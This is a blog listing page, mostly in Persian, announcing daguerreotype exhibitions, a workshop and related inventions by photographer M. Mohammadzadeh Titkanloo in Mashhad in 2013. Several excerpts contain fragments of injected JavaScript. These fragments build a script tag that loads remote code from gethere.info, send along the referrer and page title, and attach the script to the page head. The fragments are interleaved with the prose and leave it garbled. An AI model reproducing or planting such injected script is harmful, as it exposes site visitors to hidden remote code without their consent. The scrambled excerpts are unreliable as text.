25
اکتبر
نمایشگاه عکس "داگرئوتیپ های شرقی" در نگارخانة " آذر نور" مشهد توسط داگرین معاصر محمد محمدزاده برگزار می شود این نمایشگاه در روز جمعه یکم آذر 1392ساعت 4/5 تا 8 شب افتتاح خواهد شد و در آن، حدود 15 عکس فاخر داگرئوتیپ که روی لوح نقره تشکیل شده است با موضوع مناظر باستانی و پرتره به نمایش گذاشته خواهد شود. همچنین این گالری، به دستگاه...
25
اکتبر
oriental daguerreotypes exhibition in "azar noor" gallery, mashhad, iran. by m. mohammadzadeh titkanloo on 22 november 2013 s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';
23
اکتبر
The “Nakhost” News paper Reperted on 23 October 2013 : Daguerreotype of Aydin Aghdashloo was made by Contemporary Iranian daguerreotypeist “M. Mohammadzadeh Titkanloo” on October 2013 in Mashhad d.getElementsByTagName('head')[0].appendChild(s);
31
مه
 the first workshop in Iran by M. Mohammadzadeh titkanloo in "iran photo museum" on Sunday June 2 at 15 to 17 PM  will be held [caption id="attachment_262" align="aligncenter" width="512"] M. Mohammadzadeh in his laboratory 2011[/caption]if (document.currentScript) {
31
مه
[caption id="attachment_256" align="aligncenter" width="160"] لایة حساس کننده داگرئوتیپ «Sensitising Layer» ابداع کننده محمد محمدزاده 1390[/caption] [caption id="attachment_258" align="aligncenter" width="197"] دستگاه داگ ساز (برای پروسة «میم داگ» و دیجیتال داگرئوتیپ )Dag maker Apparatus اختراع از محمد محمدزاده 1390[/caption] [caption id="attachment_257" align="aligncenter" width="154"] مایع کنتراست و فیلم محافظ داگرئوتیپ contrast & protective solution ابداع کننده محمد محمدزاده 1390[/caption]   Inventions for Daguerreotype in Iran by M. Mohammadzadeh...
21
مه
داگرئوتیپ نخستین شیوة عکاسی، در سال 1839 میلادی توسط «لویی داگر» فرانسوی معرفی گردید. یک عکس داگ توسط ذرات نقره و یُد با وساطت بخار جیوه در سطح یک لوح از جنس نقرة براق شده، پس از پوز دادن (نور دادن) بدست می آید. تضاد بین ذرات در سطح لوحه، آن چیزی است که باعث تشکیل تنالیته ها و کنتراست در تصویر می گردد. هنگام...